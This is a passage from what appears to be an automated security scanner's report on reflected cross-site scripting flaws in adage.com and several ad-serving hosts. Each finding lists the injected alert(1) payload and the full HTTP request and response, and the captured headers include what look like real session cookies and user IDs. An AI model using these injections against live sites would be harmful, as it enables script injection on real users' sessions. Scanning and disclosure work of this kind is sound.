GET /scripts/jquery.onefblikev1.1.jsd6761"-alert(1)-"f29ca89fea7?1313425344 HTTP/1.1
Host: adage.com
Proxy-Connection: keep-alive
Referer: http://adage.com/article/digital/doubleverify-33m-funding/229525/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ADAGESESS=0d25b5e631b2fc5d043d5492bc297f21; HMAC=B7563EA22996A55443F2832D3B97D4FBAA83B97F; redirect=%2Farticle%2Fdigital%2Fdoubleverify-33m-funding%2F229525%2F

Response

HTTP/1.1 404 Not Found
Date: Thu, 01 Sep 2011 16:10:13 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: HMAC=792FCF44B88F1277C9A72A60929D702C4C47B0D1; path=/
Set-Cookie: HMAC=6C26DBBBAE6435C3100DB3321787AD8E64CDA44B; path=/
Set-Cookie: HMAC=A840CB8D94DCF4735D71175DA41056CDA0F17A63; path=/
Vary: Accept-Encoding,User-Agent
Content-Length: 49467
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="en" xmlns:og="http://opengraphprotocol.org/schema/">
<head profile="http://a9.com/-/spec/opensearch/1.1/">
<title>Oops! - Advertising Age</title>
<meta name="robots" conten
...[SNIP]...
-crain.hitbox.com";

//CONFIGURATION VARIABLES
hbx.acct    = "DM530303F9CM83EN3";
hbx.pn        = "404.php?1313425344";//THIS IS THE UNIQUE PAGE IDENTIFIER
hbx.mlc    = "adage.com/scripts/jquery.onefblikev1.1.jsd6761"-alert(1)-"f29ca89fea7"; //THIS IS THE UNIQUE PAGE LOCATION IDENTIFIER
hbx.pndef    = "title";
hbx.ctdef    = "full";

//OPTIONAL PAGE VARIABLES
//ACTION SETTINGS
hbx.fv="";
hbx.lt="none";
hbx.dlf="!.cms,.js";
hbx.dft="y";
hbx.e
...[SNIP]...

1.144. http://adage.com/scripts/jquery.onefblikev1.2.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adage.com
Path:   /scripts/jquery.onefblikev1.2.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 104ac"-alert(1)-"0dceffe146a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /scripts104ac"-alert(1)-"0dceffe146a/jquery.onefblikev1.2.js?1313425344 HTTP/1.1
Host: adage.com
Proxy-Connection: keep-alive
Referer: http://adage.com/article/digital/doubleverify-33m-funding/229525/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ADAGESESS=0d25b5e631b2fc5d043d5492bc297f21; HMAC=B7563EA22996A55443F2832D3B97D4FBAA83B97F; redirect=%2Farticle%2Fdigital%2Fdoubleverify-33m-funding%2F229525%2F

Response

HTTP/1.1 404 Not Found
Date: Thu, 01 Sep 2011 16:09:19 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: HMAC=EBAB5867C21BE692F13F81B7DD8E4D6ABC5F76FF; path=/
Set-Cookie: HMAC=7DC03D9D66698960F451F04BB508BFB0D7FE78C1; path=/
Set-Cookie: HMAC=1745516514A169ADF8390AA108CF2827C370FC96; path=/
Vary: Accept-Encoding,User-Agent
Content-Length: 49467
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="en" xmlns:og="http://opengraphprotocol.org/schema/">
<head profile="http://a9.com/-/spec/opensearch/1.1/">
<title>Oops! - Advertising Age</title>
<meta name="robots" conten
...[SNIP]...
c="HBX0100u";hbx.gn="ehg-crain.hitbox.com";

//CONFIGURATION VARIABLES
hbx.acct    = "DM530303F9CM83EN3";
hbx.pn        = "404.php?1313425344";//THIS IS THE UNIQUE PAGE IDENTIFIER
hbx.mlc    = "adage.com/scripts104ac"-alert(1)-"0dceffe146a/jquery.onefblikev1.2.js"; //THIS IS THE UNIQUE PAGE LOCATION IDENTIFIER
hbx.pndef    = "title";
hbx.ctdef    = "full";

//OPTIONAL PAGE VARIABLES
//ACTION SETTINGS
hbx.fv="";
hbx.lt="none";
hbx.dlf="!.cms,
...[SNIP]...

1.145. http://adage.com/scripts/jquery.onefblikev1.2.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adage.com
Path:   /scripts/jquery.onefblikev1.2.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a9063"-alert(1)-"f157f019c33 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /scripts/jquery.onefblikev1.2.jsa9063"-alert(1)-"f157f019c33?1313425344 HTTP/1.1
Host: adage.com
Proxy-Connection: keep-alive
Referer: http://adage.com/article/digital/doubleverify-33m-funding/229525/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ADAGESESS=0d25b5e631b2fc5d043d5492bc297f21; HMAC=B7563EA22996A55443F2832D3B97D4FBAA83B97F; redirect=%2Farticle%2Fdigital%2Fdoubleverify-33m-funding%2F229525%2F

Response

HTTP/1.1 404 Not Found
Date: Thu, 01 Sep 2011 16:10:14 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: HMAC=9619510D151FD5BB8A0A4F456386079CD145197C; path=/
Set-Cookie: HMAC=8090FCBE243F2832B160BF74B1ED96CDAE1E6150; path=/
Set-Cookie: HMAC=F0A1DD38620FD18090FDC1ABA791E0EFE74668FC; path=/
Vary: Accept-Encoding,User-Agent
Content-Length: 49467
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="en" xmlns:og="http://opengraphprotocol.org/schema/">
<head profile="http://a9.com/-/spec/opensearch/1.1/">
<title>Oops! - Advertising Age</title>
<meta name="robots" conten
...[SNIP]...
-crain.hitbox.com";

//CONFIGURATION VARIABLES
hbx.acct    = "DM530303F9CM83EN3";
hbx.pn        = "404.php?1313425344";//THIS IS THE UNIQUE PAGE IDENTIFIER
hbx.mlc    = "adage.com/scripts/jquery.onefblikev1.2.jsa9063"-alert(1)-"f157f019c33"; //THIS IS THE UNIQUE PAGE LOCATION IDENTIFIER
hbx.pndef    = "title";
hbx.ctdef    = "full";

//OPTIONAL PAGE VARIABLES
//ACTION SETTINGS
hbx.fv="";
hbx.lt="none";
hbx.dlf="!.cms,.js";
hbx.dft="y";
hbx.e
...[SNIP]...

1.146. http://adage.com/scripts/lib.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adage.com
Path:   /scripts/lib.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ee42c"-alert(1)-"efc55fb88e2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /scriptsee42c"-alert(1)-"efc55fb88e2/lib.js?1291744536 HTTP/1.1
Host: adage.com
Proxy-Connection: keep-alive
Referer: http://adage.com/article/digital/doubleverify-33m-funding/229525/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ADAGESESS=0d25b5e631b2fc5d043d5492bc297f21; HMAC=B7563EA22996A55443F2832D3B97D4FBAA83B97F; redirect=%2Farticle%2Fdigital%2Fdoubleverify-33m-funding%2F229525%2F

Response

HTTP/1.1 404 Not Found
Date: Thu, 01 Sep 2011 16:09:13 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: HMAC=FC83D1EA153ADB7ECA957E976F080E54A3BDE903; path=/
Set-Cookie: HMAC=507A20C562A54C34DBEAAA492A97EAA8ECFCC6A6; path=/
Set-Cookie: HMAC=DBCDEF6C250F50F2C43BD956DDFB0AA1FB476DBB; path=/
Vary: Accept-Encoding,User-Agent
Content-Length: 49450
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="en" xmlns:og="http://opengraphprotocol.org/schema/">
<head profile="http://a9.com/-/spec/opensearch/1.1/">
<title>Oops! - Advertising Age</title>
<meta name="robots" conten
...[SNIP]...
c="HBX0100u";hbx.gn="ehg-crain.hitbox.com";

//CONFIGURATION VARIABLES
hbx.acct    = "DM530303F9CM83EN3";
hbx.pn        = "404.php?1291744536";//THIS IS THE UNIQUE PAGE IDENTIFIER
hbx.mlc    = "adage.com/scriptsee42c"-alert(1)-"efc55fb88e2/lib.js"; //THIS IS THE UNIQUE PAGE LOCATION IDENTIFIER
hbx.pndef    = "title";
hbx.ctdef    = "full";

//OPTIONAL PAGE VARIABLES
//ACTION SETTINGS
hbx.fv="";
hbx.lt="none";
hbx.dlf="!.cms,.js";
hbx.dft="y"
...[SNIP]...

1.147. http://adage.com/scripts/lib.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adage.com
Path:   /scripts/lib.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload da2e1"-alert(1)-"09160422661 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /scripts/lib.jsda2e1"-alert(1)-"09160422661?1291744536 HTTP/1.1
Host: adage.com
Proxy-Connection: keep-alive
Referer: http://adage.com/article/digital/doubleverify-33m-funding/229525/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ADAGESESS=0d25b5e631b2fc5d043d5492bc297f21; HMAC=B7563EA22996A55443F2832D3B97D4FBAA83B97F; redirect=%2Farticle%2Fdigital%2Fdoubleverify-33m-funding%2F229525%2F

Response

HTTP/1.1 404 Not Found
Date: Thu, 01 Sep 2011 16:09:30 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: HMAC=EBCDBB89CCF1C4E8DE3FE6DD5CA44E218F439245; path=/
Set-Cookie: HMAC=B4B6F28F9D90E176C0CBC73DF6354ADEA0C0F333; path=/
Set-Cookie: HMAC=55FF4EACA1D7CBCFD1F90228024C9CDB6FD54993; path=/
Vary: Accept-Encoding,User-Agent
Content-Length: 49450
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="en" xmlns:og="http://opengraphprotocol.org/schema/">
<head profile="http://a9.com/-/spec/opensearch/1.1/">
<title>Oops! - Advertising Age</title>
<meta name="robots" conten
...[SNIP]...
100u";hbx.gn="ehg-crain.hitbox.com";

//CONFIGURATION VARIABLES
hbx.acct    = "DM530303F9CM83EN3";
hbx.pn        = "404.php?1291744536";//THIS IS THE UNIQUE PAGE IDENTIFIER
hbx.mlc    = "adage.com/scripts/lib.jsda2e1"-alert(1)-"09160422661"; //THIS IS THE UNIQUE PAGE LOCATION IDENTIFIER
hbx.pndef    = "title";
hbx.ctdef    = "full";

//OPTIONAL PAGE VARIABLES
//ACTION SETTINGS
hbx.fv="";
hbx.lt="none";
hbx.dlf="!.cms,.js";
hbx.dft="y";
hbx.e
...[SNIP]...

1.148. http://adage.com/scripts/sniff.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adage.com
Path:   /scripts/sniff.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 608bd"-alert(1)-"f66b54a0fd5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /scripts608bd"-alert(1)-"f66b54a0fd5/sniff.js?1314299432 HTTP/1.1
Host: adage.com
Proxy-Connection: keep-alive
Referer: http://adage.com/article/digital/doubleverify-33m-funding/229525/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ADAGESESS=0d25b5e631b2fc5d043d5492bc297f21; HMAC=B7563EA22996A55443F2832D3B97D4FBAA83B97F; redirect=%2Farticle%2Fdigital%2Fdoubleverify-33m-funding%2F229525%2F

Response

HTTP/1.1 404 Not Found
Date: Thu, 01 Sep 2011 16:09:11 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: HMAC=85C478972A06CF51F23508EBF3B28E90EFFC2D77; path=/
Set-Cookie: HMAC=39E60074C0C67D2C160347C4C9DB49769CEF9A38; path=/
Set-Cookie: HMAC=031ECE6E620E860A401A3E581AA7130970EA59C1; path=/
Vary: Accept-Encoding,User-Agent
Content-Length: 49452
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="en" xmlns:og="http://opengraphprotocol.org/schema/">
<head profile="http://a9.com/-/spec/opensearch/1.1/">
<title>Oops! - Advertising Age</title>
<meta name="robots" conten
...[SNIP]...
c="HBX0100u";hbx.gn="ehg-crain.hitbox.com";

//CONFIGURATION VARIABLES
hbx.acct    = "DM530303F9CM83EN3";
hbx.pn        = "404.php?1314299432";//THIS IS THE UNIQUE PAGE IDENTIFIER
hbx.mlc    = "adage.com/scripts608bd"-alert(1)-"f66b54a0fd5/sniff.js"; //THIS IS THE UNIQUE PAGE LOCATION IDENTIFIER
hbx.pndef    = "title";
hbx.ctdef    = "full";

//OPTIONAL PAGE VARIABLES
//ACTION SETTINGS
hbx.fv="";
hbx.lt="none";
hbx.dlf="!.cms,.js";
hbx.dft="
...[SNIP]...

1.149. http://adage.com/scripts/sniff.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adage.com
Path:   /scripts/sniff.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 81763"-alert(1)-"1b4c8ebcd37 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /scripts/sniff.js81763"-alert(1)-"1b4c8ebcd37?1314299432 HTTP/1.1
Host: adage.com
Proxy-Connection: keep-alive
Referer: http://adage.com/article/digital/doubleverify-33m-funding/229525/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ADAGESESS=0d25b5e631b2fc5d043d5492bc297f21; HMAC=B7563EA22996A55443F2832D3B97D4FBAA83B97F; redirect=%2Farticle%2Fdigital%2Fdoubleverify-33m-funding%2F229525%2F

Response

HTTP/1.1 404 Not Found
Date: Thu, 01 Sep 2011 16:09:29 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: HMAC=393173EFE5216979CBF8F08A2C92BBCBDC9BF757; path=/
Set-Cookie: HMAC=0154871FD70557B70A53061157F3F7921FAC3DF3; path=/
Set-Cookie: HMAC=2F8D789D484798D8ABCC858E5B7E7C1DD17AA331; path=/
Vary: Accept-Encoding,User-Agent
Content-Length: 49452
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="en" xmlns:og="http://opengraphprotocol.org/schema/">
<head profile="http://a9.com/-/spec/opensearch/1.1/">
<title>Oops! - Advertising Age</title>
<meta name="robots" conten
...[SNIP]...
0u";hbx.gn="ehg-crain.hitbox.com";

//CONFIGURATION VARIABLES
hbx.acct    = "DM530303F9CM83EN3";
hbx.pn        = "404.php?1314299432";//THIS IS THE UNIQUE PAGE IDENTIFIER
hbx.mlc    = "adage.com/scripts/sniff.js81763"-alert(1)-"1b4c8ebcd37"; //THIS IS THE UNIQUE PAGE LOCATION IDENTIFIER
hbx.pndef    = "title";
hbx.ctdef    = "full";

//OPTIONAL PAGE VARIABLES
//ACTION SETTINGS
hbx.fv="";
hbx.lt="none";
hbx.dlf="!.cms,.js";
hbx.dft="y";
hbx.e
...[SNIP]...

1.150. http://admeld-match.dotomi.com/admeld/match [admeld_adprovider_id parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://admeld-match.dotomi.com
Path:   /admeld/match

Issue detail

The value of the admeld_adprovider_id request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2c66c'%3balert(1)//7a5ab1f91b4 was submitted in the admeld_adprovider_id parameter. This input was echoed as 2c66c';alert(1)//7a5ab1f91b4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /admeld/match?admeld_user_id=64775c16-cf5b-479e-8b02-d11a229fedb4&admeld_adprovider_id=782c66c'%3balert(1)//7a5ab1f91b4&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: admeld-match.dotomi.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/257/campusfood/728x90/campusfood_atf?t=1313102872367&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fcdn2.allmenus.com.s3.amazonaws.com%2Fv50%2Fcommon%2Fstatic%2Fadvertisements.html%3Fserver%3Dwww.allmenus.com%26slot%3Dam_50_header_leaderboard%26ignore%3Dtrue&refer=http%3A%2F%2Fwww.allmenus.com%2Fny%2Fnew-york%2F297850-underground-pizza%2Finfo%2F
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 11 Aug 2011 22:49:32 GMT
X-Name: rtb-s10
Cache-Control: max-age=0, no-store
Content-Type: text/javascript
Connection: close
Content-Length: 160

document.write('<img src="http://tag.admeld.com/match?admeld_adprovider_id=782c66c';alert(1)//7a5ab1f91b4&external_user_id=0&expiration=1313362172" alt="" />');

1.151. http://admeld-match.dotomi.com/admeld/match [admeld_callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://admeld-match.dotomi.com
Path:   /admeld/match

Issue detail

The value of the admeld_callback request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 456c5'%3balert(1)//640b1256e6d was submitted in the admeld_callback parameter. This input was echoed as 456c5';alert(1)//640b1256e6d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /admeld/match?admeld_user_id=64775c16-cf5b-479e-8b02-d11a229fedb4&admeld_adprovider_id=78&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match456c5'%3balert(1)//640b1256e6d HTTP/1.1
Host: admeld-match.dotomi.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/257/campusfood/728x90/campusfood_atf?t=1313102872367&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fcdn2.allmenus.com.s3.amazonaws.com%2Fv50%2Fcommon%2Fstatic%2Fadvertisements.html%3Fserver%3Dwww.allmenus.com%26slot%3Dam_50_header_leaderboard%26ignore%3Dtrue&refer=http%3A%2F%2Fwww.allmenus.com%2Fny%2Fnew-york%2F297850-underground-pizza%2Finfo%2F
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 11 Aug 2011 22:49:28 GMT
X-Name: rtb-s07
Cache-Control: max-age=0, no-store
Content-Type: text/javascript
Connection: close
Content-Length: 160

document.write('<img src="http://tag.admeld.com/match456c5';alert(1)//640b1256e6d?admeld_adprovider_id=78&external_user_id=0&expiration=1313362168" alt="" />');

1.152. http://admeld.adnxs.com/usersync [admeld_adprovider_id parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://admeld.adnxs.com
Path:   /usersync

Issue detail

The value of the admeld_adprovider_id request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ffdde'-alert(1)-'de9a7a700f7 was submitted in the admeld_adprovider_id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /usersync?calltype=admeld&admeld_user_id=64775c16-cf5b-479e-8b02-d11a229fedb4&admeld_adprovider_id=193ffdde'-alert(1)-'de9a7a700f7&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: admeld.adnxs.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/725/nydailynews/728x90/news_atf?t=1313102492008&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=http%3A%2F%2Fwww.nydailynews.com%2Fnews%2Findex.html&refer=http%3A%2F%2Fwww.nydailynews.com%2Findex.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChIIv48BEAoYAiACKAIw9rOR8gQQ9rOR8gQYAQ..; anj=Kfu=8fG6Q/E:3F.0s]#%2L_'x%SEV/i#+31!z6W^#Wxroe.<ed*ist544(8y#/m1[3Nc?tO=4X@hL+.Kd6c?b+fuhR+)g'<6_vh7fQ1k@_^]+bUxTbyXA)qJ8sg`L(m<E@fRox[ex7O-wbM6.FBu=<v!>MH%v>fAp7WP*Xu^!ccw3[EoMfB3[?@tGV5Iprw.k.r!*JxnV2i6j; sess=1; uuid2=3539656946931560696

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Fri, 12-Aug-2011 22:43:29 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=3539656946931560696; path=/; expires=Wed, 09-Nov-2011 22:43:29 GMT; domain=.adnxs.com; HttpOnly
Content-Type: application/x-javascript
Date: Thu, 11 Aug 2011 22:43:29 GMT
Content-Length: 183

document.write('<img src="http://tag.admeld.com/match?admeld_adprovider_id=193ffdde'-alert(1)-'de9a7a700f7&external_user_id=3539656946931560696&expiration=0" width="0" height="0"/>');

1.153. http://admeld.adnxs.com/usersync [admeld_callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://admeld.adnxs.com
Path:   /usersync

Issue detail

The value of the admeld_callback request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c0848'-alert(1)-'85376933358 was submitted in the admeld_callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /usersync?calltype=admeld&admeld_user_id=64775c16-cf5b-479e-8b02-d11a229fedb4&admeld_adprovider_id=193&admeld_call_type=js&admeld_callback=http://tag.admeld.com/matchc0848'-alert(1)-'85376933358 HTTP/1.1
Host: admeld.adnxs.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/725/nydailynews/728x90/news_atf?t=1313102492008&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=http%3A%2F%2Fwww.nydailynews.com%2Fnews%2Findex.html&refer=http%3A%2F%2Fwww.nydailynews.com%2Findex.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChIIv48BEAoYAiACKAIw9rOR8gQQ9rOR8gQYAQ..; anj=Kfu=8fG6Q/E:3F.0s]#%2L_'x%SEV/i#+31!z6W^#Wxroe.<ed*ist544(8y#/m1[3Nc?tO=4X@hL+.Kd6c?b+fuhR+)g'<6_vh7fQ1k@_^]+bUxTbyXA)qJ8sg`L(m<E@fRox[ex7O-wbM6.FBu=<v!>MH%v>fAp7WP*Xu^!ccw3[EoMfB3[?@tGV5Iprw.k.r!*JxnV2i6j; sess=1; uuid2=3539656946931560696

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Fri, 12-Aug-2011 22:43:49 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=3539656946931560696; path=/; expires=Wed, 09-Nov-2011 22:43:49 GMT; domain=.adnxs.com; HttpOnly
Content-Type: application/x-javascript
Date: Thu, 11 Aug 2011 22:43:49 GMT
Content-Length: 183

document.write('<img src="http://tag.admeld.com/matchc0848'-alert(1)-'85376933358?admeld_adprovider_id=193&external_user_id=3539656946931560696&expiration=0" width="0" height="0"/>');

1.154. http://admeld.lucidmedia.com/clicksense/admeld/match [admeld_adprovider_id parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://admeld.lucidmedia.com
Path:   /clicksense/admeld/match

Issue detail

The value of the admeld_adprovider_id request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1428a'%3balert(1)//b1769215d63 was submitted in the admeld_adprovider_id parameter. This input was echoed as 1428a';alert(1)//b1769215d63 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /clicksense/admeld/match?admeld_user_id=64775c16-cf5b-479e-8b02-d11a229fedb4&admeld_adprovider_id=731428a'%3balert(1)//b1769215d63&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match HTTP/1.1
